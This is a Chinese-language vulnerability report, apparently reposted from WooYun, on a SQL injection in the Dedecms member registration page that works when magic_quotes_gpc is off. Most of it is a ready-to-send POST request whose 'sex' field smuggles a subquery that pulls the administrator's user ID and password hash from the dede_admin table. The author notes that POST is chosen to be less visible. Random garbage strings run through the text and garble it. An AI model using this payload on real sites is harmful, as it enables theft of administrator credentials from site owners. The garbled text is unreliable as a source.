漏洞类型: SQL注射漏洞
, y9 `% S% h! R# h- y( J( L简要描述:
9 L- t \; g- a, Y9 n# C
: b- p1 h2 ?' R$ N& {+ k" f需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
6 \' T& @8 Q" T: x' j$ a. v5 F3 f原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
5 J/ C0 `. ?% `9 A; @详细说明:跟这个漏洞( w1 c8 w9 _$ |: H9 a% x" }
! V" c! \' u- j" S7 f$ y
WooYun: Dedecms SQL注射导致审核机制绕过漏洞# v$ b( B/ D) @ ^6 J! `' Q# F1 K
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.* g( _) h8 W" a9 ^) F
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
/ w) T/ e& b1 W! k & J# @ s" M3 l1 r2 S& c6 b$ v
www.political-security.com/member/reg_new.php
4 A9 w9 g( x& F( h0 U9 N$ J; B " ?5 X7 I5 u" g. u; a- R E
POST
' I! y5 Y$ `( V- b5 {) T$ Z 4 {) W1 V- l& |9 r- F% r
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
3 c$ R$ H5 Y/ n- U5 r" Nuserid=c4rp3nt3r&uname=c4rp3nt3r
% R4 `8 n/ T( w. r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss/ m% V2 b( O8 k) e7 Z- A
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
2 d; {4 ^4 }! Z1 Y8 H8 Y" @5 _(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
- z, w2 ?& |% l0 w2 b+ J%00&vdcode=glos&agree= |